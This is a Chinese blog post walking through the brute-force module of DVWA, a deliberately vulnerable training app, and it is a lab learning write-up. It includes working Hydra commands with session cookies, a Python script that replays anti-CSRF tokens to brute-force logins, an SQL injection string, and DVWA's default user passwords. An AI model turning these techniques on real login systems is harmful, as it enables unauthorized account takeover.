<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">










<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="前言最近想要再系统地过一遍一些基础的渗透漏洞知识, 看到网上不少人推荐 DVWA 这个平台, 就试了一下, 发现的确很适合初学者, 最主要有源码比较这个功能让人能很好地理解利用这个漏洞的原理和过程. 我知道如果 Google 能搜出很多关于 DVWA 的攻略和总结, 本系列文章也是我学习时的总结, 带有很强的主观意识, 也不保证写的全是正确的, 欢迎大家在留言区留言, 大家一起讨论 :)">
<meta name="keywords" content="DVWA,学习总结,爆破">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA-brute">
<meta property="og:url" content="https://qmsharing.space/2018/11/28/DVWA-brute/index.html">
<meta property="og:site_name" content="Qm&#39;s Blog">
<meta property="og:description" content="前言最近想要再系统地过一遍一些基础的渗透漏洞知识, 看到网上不少人推荐 DVWA 这个平台, 就试了一下, 发现的确很适合初学者, 最主要有源码比较这个功能让人能很好地理解利用这个漏洞的原理和过程. 我知道如果 Google 能搜出很多关于 DVWA 的攻略和总结, 本系列文章也是我学习时的总结, 带有很强的主观意识, 也不保证写的全是正确的, 欢迎大家在留言区留言, 大家一起讨论 :)">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://qmsharing.space/2018/11/28/DVWA-brute/dvwa/brute/wrong1.PNG">
<meta property="og:image" content="https://qmsharing.space/2018/11/28/DVWA-brute/dvwa/brute/prove1.PNG">
<meta property="og:image" content="https://qmsharing.space/2018/11/28/DVWA-brute/dvwa/brute/prove2.PNG">
<meta property="og:image" content="https://qmsharing.space/2018/11/28/DVWA-brute/dvwa/brute/prove3.PNG">
<meta property="og:updated_time" content="2018-11-29T16:16:11.644Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DVWA-brute">
<meta name="twitter:description" content="前言最近想要再系统地过一遍一些基础的渗透漏洞知识, 看到网上不少人推荐 DVWA 这个平台, 就试了一下, 发现的确很适合初学者, 最主要有源码比较这个功能让人能很好地理解利用这个漏洞的原理和过程. 我知道如果 Google 能搜出很多关于 DVWA 的攻略和总结, 本系列文章也是我学习时的总结, 带有很强的主观意识, 也不保证写的全是正确的, 欢迎大家在留言区留言, 大家一起讨论 :)">
<meta name="twitter:image" content="https://qmsharing.space/2018/11/28/DVWA-brute/dvwa/brute/wrong1.PNG">



  <link rel="alternate" href="/atom.xml" title="Qm's Blog" type="application/atom+xml" />




  <link rel="canonical" href="https://qmsharing.space/2018/11/28/DVWA-brute/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>DVWA-brute | Qm's Blog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Qm's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">Place to enjoy sharing</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://qmsharing.space/2018/11/28/DVWA-brute/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Jacko Qm">
      <meta itemprop="description" content="Stay Hungry Stay Foolish">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Qm's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DVWA-brute
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-11-28 10:37:22" itemprop="dateCreated datePublished" datetime="2018-11-28T10:37:22Z">2018-11-28</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2018-11-29 16:16:11" itemprop="dateModified" datetime="2018-11-29T16:16:11Z">2018-11-29</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/经验总结/" itemprop="url" rel="index"><span itemprop="name">经验总结</span></a></span>

                
                
                  ，
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/经验总结/渗透学习/" itemprop="url" rel="index"><span itemprop="name">渗透学习</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon"
            >
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近想要再系统地过一遍一些基础的渗透漏洞知识, 看到网上不少人推荐 DVWA 这个平台, 就试了一下, 发现的确很适合初学者, 最主要有源码比较这个功能让人能很好地理解利用这个漏洞的原理和过程. 我知道如果 Google 能搜出很多关于 DVWA 的攻略和总结, 本系列文章也是我学习时的总结, 带有很强的主观意识, 也不保证写的全是正确的, 欢迎大家在留言区留言, 大家一起讨论 :)</p>
<a id="more"></a>
<h2 id="本题任务"><a href="#本题任务" class="headerlink" title="本题任务:"></a>本题任务:</h2><p>通过暴力破解出管理员 admin 的密码. 还有四个隐藏用户等待你的挖掘 ;)</p>
<h2 id="爆破时遇到问题"><a href="#爆破时遇到问题" class="headerlink" title="爆破时遇到问题:"></a>爆破时遇到问题:</h2><p><strong>Hydra 爆破时返回的结果不正确, 而且返回的就是字典头几个数值:</strong></p>
<p>我一开始直接用下面的命令进行爆破:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra 172.28.128.4 -l admin -P Downloads/password.txt http-get-form "/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:Username and/or password incorrect."</span><br></pre></td></tr></table></figure>
<p><img src="/2018/11/28/DVWA-brute/dvwa/brute/wrong1.PNG" alt="爆破结果图"></p>
<p>这结果肯定不对… 直接把前15个爆破密码返回了. 造成这个情况的可能性有两个, 都可以通过 curl 指令来检查. 第一个可能性是你的网络出问题了, 有时 hydra 在连不上服务器时会错误的认为返回的结果是正确的, 然而我当时返回的是 proxy error. 第二个可能性是你漏了一些必要参数(Cookies), 这个的确容易忽略, 这里我用 wireshark 进行抓包查看问题.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 附上怎么用 curl 指令来检测, 注意 get 参数的连接符 <span class="string">"&amp;"</span>, 要 escape 它不然会出问题的</span></span><br><span class="line">curl -b "security=low;PHPSESSID=f2uni4k3m1ftf4o7vunc1qud30" -o result.html http://172.28.128.4/vulnerabilities/brute/index.php?username=admin\&amp;password=admin\&amp;Login=Login</span><br></pre></td></tr></table></figure>
<p><img src="/2018/11/28/DVWA-brute/dvwa/brute/prove1.PNG" alt="wireshark 结果"></p>
<p>可以看出它被重定向了,  查看详细信息会发现它被重定向回 “Location: ../../login.php\r\n”, 也就是一开始的登录界面, (这个登录界面是你登录 dvwa 的界面, 而不是你进行爆破的登录界面), 通过 firefox 抓包, 可以看到我们每次提交 get 请求时会先提交 PHPSESSID 来帮助服务器确定你已经登录了, 否则就会被重定向.</p>
<p><img src="/2018/11/28/DVWA-brute/dvwa/brute/prove2.PNG" alt="Cookies"></p>
<p>解决方法就是让 hydra 在提交请求时带上 Cookies, 因此正确的写法是:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra 172.28.128.4 -l admin -P Downloads/password.txt http-get-form "/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:incorrect.:H=Cookie:PHPSESSID=f2uni4k3m1ftf4o7vunc1qud30;security=low;"</span><br></pre></td></tr></table></figure>
<p>嗯… 我当时也以为这样肯定就对了, 但得到了和第一次错误时一样的结果(这里就不上图了). 继续 wireshark 抓包, 发现</p>
<p><img src="/2018/11/28/DVWA-brute/dvwa/brute/prove3.PNG" alt="分析错误2"></p>
<p>这… 怎么少了个 P, 其实吧, 因为 H=Cookie:PHPSESSID=… 这样写是错的, 正确的写法是 H=Cookie:[空格]PHPSESSID=… , 我不清楚是不是就我一个犯了这么低级的问题, 但我觉得这个问题挺隐蔽的, 不抓包分析你会觉得一头雾水, 希望能帮到还无法成功爆破的人. 最终的指令是:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra 172.28.128.4 -l admin -P Downloads/password.txt http-get-form "/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:incorrect.:H=Cookie: PHPSESSID=f2uni4k3m1ftf4o7vunc1qud30;security=low;"</span><br></pre></td></tr></table></figure>
<h4 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h4><p>的确毫无安全措施, 除了能被爆破还能被 SQL 注入, 利用 ‘ or 1=1 limit 1,1 # 就能把几个用户全部爆破出来. 然后通过显示的图片可以大概猜到用户名是什么, 继续用字典进行爆破.</p>
<h4 id="Medium"><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h4><p>这个相比于 Low 等级多加了 <code>mysqli_real_escape_string</code> 函数来防止 SQL 注入, 但并有从本质上解决爆破问题(差点没看到新添加的 sleep(2), 但你觉得黑客会少那几分钟(难道黑客不会开多线程)吗?)</p>
<h4 id="High"><a href="#High" class="headerlink" title="High"></a>High</h4><p>这次是在表单添加了一个隐藏的 token, 这个 token 在表单被提交的时候一同提交, 网站先验证这个 token 是否与其在服务端保存的相同, 不相同则拒绝服务. 这个 token 主要用来防止 CSRF 漏洞, 也顺带把 hydra 给防了.</p>
<p>但这也并不代表它已经无懈可击了, 我们可以通过 python(或其他手段) 来先获得一次界面的 token 后, 再通过下一次的尝试发送出去, 这样也是能实现爆破的, 其他的比如登录失败时随机睡眠个几秒的也是不能解决问题的.<br>附上当时写的 python 脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">import</span> urllib2</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">header = &#123;<span class="string">'Host'</span>: <span class="string">'172.28.128.4'</span>,</span><br><span class="line">                  <span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Windows NT 6.1 Win64 x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'</span>,</span><br><span class="line">          <span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate, sdch'</span>,</span><br><span class="line">          <span class="string">'Cookie'</span>: <span class="string">'security=high; PHPSESSID=3fnsi3uvhb068gmb3a1d1vnpb5'</span>&#125;</span><br><span class="line">requrl = <span class="string">"http://172.28.128.4/vulnerabilities/brute/"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_token_and_length</span><span class="params">(requrl, header, is_first=False)</span>:</span></span><br><span class="line">    req = urllib2.Request(url=requrl, headers=header)</span><br><span class="line">    response = urllib2.urlopen(req)</span><br><span class="line">    <span class="keyword">print</span> response.getcode(),</span><br><span class="line">    the_page = response.read()</span><br><span class="line">    length = len(the_page)</span><br><span class="line">    <span class="keyword">print</span> length</span><br><span class="line">    soup = BeautifulSoup(the_page, <span class="string">"html.parser"</span>)</span><br><span class="line">    <span class="comment"># get the user_token</span></span><br><span class="line">    user_token = soup.select(<span class="string">'input[type="hidden"]'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">    <span class="keyword">return</span> (user_token.decode(<span class="string">'unicode-escape'</span>).encode(<span class="string">'utf-8'</span>), length)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">wrong_len = <span class="number">0</span></span><br><span class="line">user_token = get_token_and_length(requrl, header)[<span class="number">0</span>]</span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">with</span> open(<span class="string">"/home/j4nobdy/Downloads/password.txt"</span>) <span class="keyword">as</span> fd:</span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> fd.readlines():</span><br><span class="line">        requrl = <span class="string">"http://172.28.128.4/vulnerabilities/brute/"</span> + \</span><br><span class="line">            <span class="string">"?username=admin&amp;password="</span> + line.strip() + <span class="string">"&amp;Login=Login&amp;user_token="</span> + user_token</span><br><span class="line">        <span class="keyword">print</span> i, <span class="string">'admin'</span>, line.strip(),</span><br><span class="line">        res = get_token_and_length(requrl, header)</span><br><span class="line">        user_token = res[<span class="number">0</span>]</span><br><span class="line">        length = res[<span class="number">1</span>]</span><br><span class="line">        <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line">            wrong_len = length</span><br><span class="line">        <span class="keyword">elif</span> wrong_len != length:</span><br><span class="line">            sys.exit(<span class="string">'Congrat! Found password!'</span>)</span><br><span class="line">        i = i + <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">'No valid password found!'</span></span><br></pre></td></tr></table></figure>
<h4 id="Impossible"><a href="#Impossible" class="headerlink" title="Impossible"></a>Impossible</h4><ol>
<li>增加了登录错误次数限制(本质上解决问题的方法), 这里作者还提醒了如果乱用反馈信息的话, 会让攻击者可以对账户进行枚举. 不过其实这样解决问题还是有个不太安全的地方, 如果有人恶意对一个已知号码进行多次错误, 就会导致被攻击用户被锁定, 也间接造成了拒绝服务攻击, 所以可以考虑在登录前再进行一次验证, 不过其实已经够用了.</li>
<li>改用了 post 方法来提交表单, 这样避免了把用户名和密码明文放在 url 中进行传递, 是一种安全的方法.</li>
<li>在处理前先提前验证了是否提交了所有参数, 一个没有提交都不进行处理, 虽然对安全方面有多少提高, 但是一种正确的逻辑.</li>
<li>使用了 PDO 预编译语句来与数据库通信, 而不是简单的拼接查询语句, 很大程度上(基本完全)防止了 SQL 注入.</li>
</ol>
<p>bugs:</p>
<ol>
<li><p>它这个判断被锁定时间的方法好像有问题, 不清楚是不是和系统或时区有关, 但是并不能成功锁定用户, 所以我又写了个基于 post 请求的 payload 成功爆破出密码了.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line"><span class="comment">// Calculate when the user would be allowed to login again</span></span><br><span class="line">$last_login = strtotime( $row[ <span class="string">'last_login'</span> ] );</span><br><span class="line">$timeout    = $last_login + ($lockout_time * <span class="number">60</span>);</span><br><span class="line">$timenow    = time();    <span class="comment">// 注意这里, 用的是 php 的 time() 函数</span></span><br><span class="line"><span class="comment">// Check to see if enough time has passed, if it hasn't locked the account</span></span><br><span class="line"><span class="keyword">if</span>( $timenow &lt; $timeout ) &#123;</span><br><span class="line"> $account_locked = <span class="keyword">true</span>;</span><br><span class="line">    <span class="comment">// print "The account is locked&lt;br /&gt;";</span></span><br><span class="line">&#125;</span><br><span class="line">......</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set the last login time, 这里设置时是用 mysql 的 now() 函数</span></span><br><span class="line">$data = $db-&gt;prepare( <span class="string">'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;'</span> );</span><br><span class="line">$data-&gt;bindParam( <span class="string">':user'</span>, $user, PDO::PARAM_STR );</span><br><span class="line">$data-&gt;execute();</span><br></pre></td></tr></table></figure>
<p>对比上面两段代码, 可以知道它在设置最后登录时间(last_login)时使用的是 mysql 内置的 now() 来获得时间, 然而在检验的时候却是使用了 php 的 time() 函数来获得时间, 理论上来说, 拿到的时间应该是一样的, 然而在我的测试环境中 time() 拿到的时间总是大于 now(), 所以导致账户每次一被锁定就立刻会被解锁, 从而造成了漏洞存在, 我觉得应该把第一段代码改成下面这样, 统一一下时间的获取方式, 也避免出现这种漏洞.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">// 从数据库拿数据时多获取一个现在时间 cur_time</span><br><span class="line">$data = $db-&gt;prepare( &apos;SELECT failed_login, last_login, now() as cur_time FROM users WHERE user = (:user) LIMIT 1;&apos; );</span><br><span class="line">......</span><br><span class="line">// Calculate when the user would be allowed to login again</span><br><span class="line">$last_login = strtotime( $row[ &apos;last_login&apos; ] );</span><br><span class="line">$timeout    = $last_login + ($lockout_time * 60);</span><br><span class="line">$timenow    = $row[ &apos;cur_time&apos; ];    // 用这个 cur_time 来作为判断条件</span><br></pre></td></tr></table></figure>
</li>
<li><p>我发现用户名输入中文的话, 即使在 Impossible 级别, 也会出现界面崩溃的情况, 估计是 PDO 的编码问题.</p>
</li>
</ol>
<p><br><br><br></p>
<p><div align="center"> <font color="red"><b>============================== 剧透警告线 ==============================</b></font></div><br><br><br><br></p>
<p>爆破出额外的用户:</p>
<p><span style="background-color: black;color: black;">u: gordonb p: abc123</span><br><span style="background-color: black;color: black;">u: pablo p: letmein</span> </p>
<p><span style="background-color: black;color: black;">u: smithy p: password</span> </p>
<p><span style="background-color: black;color: black;">u: 1337 p: charley</span> </p>
<h1 id="这个我没有爆出来-后来查了数据库拿到密码的-md5-用彩虹桥碰撞了出来"><a href="#这个我没有爆出来-后来查了数据库拿到密码的-md5-用彩虹桥碰撞了出来" class="headerlink" title="这个我没有爆出来, 后来查了数据库拿到密码的 md5, 用彩虹桥碰撞了出来"></a>这个我没有爆出来, 后来查了数据库拿到密码的 md5, 用彩虹桥碰撞了出来</h1>
      
    </div>

    

    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>Jacko Qm</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://qmsharing.space/2018/11/28/DVWA-brute/" title="DVWA-brute">https://qmsharing.space/2018/11/28/DVWA-brute/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/DVWA/" rel="tag"># DVWA</a>
          
            <a href="/tags/学习总结/" rel="tag"># 学习总结</a>
          
            <a href="/tags/爆破/" rel="tag"># 爆破</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/20/pwnable-kr-answers/" rel="next" title="pwnable.kr-answers">
                <i class="fa fa-chevron-left"></i> pwnable.kr-answers
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          
  <div class="comments" id="comments">
    
      <div id="gitalk-container"></div>
      <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.png"
                alt="Jacko Qm" />
            
              <p class="site-author-name" itemprop="name">Jacko Qm</p>
              <p class="site-description motion-element" itemprop="description">Stay Hungry Stay Foolish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">6</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">7</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/JackoQm" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i></a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:&#117;&#115;&#101;&#114;&#113;&#109;&#64;&#49;&#54;&#51;&#46;&#99;&#111;&#109;" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i></a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://www.jianshu.com/u/1c2ecd8e07d2" target="_blank" title="Jianshu"><i class="fa fa-fw fa-book"></i></a>
                  
                </span>
              
            </div>
          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#本题任务"><span class="nav-number">2.</span> <span class="nav-text">本题任务:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#爆破时遇到问题"><span class="nav-number">3.</span> <span class="nav-text">爆破时遇到问题:</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Low"><span class="nav-number">3.0.1.</span> <span class="nav-text">Low</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Medium"><span class="nav-number">3.0.2.</span> <span class="nav-text">Medium</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#High"><span class="nav-number">3.0.3.</span> <span class="nav-text">High</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Impossible"><span class="nav-number">3.0.4.</span> <span class="nav-text">Impossible</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#这个我没有爆出来-后来查了数据库拿到密码的-md5-用彩虹桥碰撞了出来"><span class="nav-number"></span> <span class="nav-text">这个我没有爆出来, 后来查了数据库拿到密码的 md5, 用彩虹桥碰撞了出来</span></a></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-quora"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jacko Qm</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.7.1</div>



  <span class="post-meta-divider">|</span>



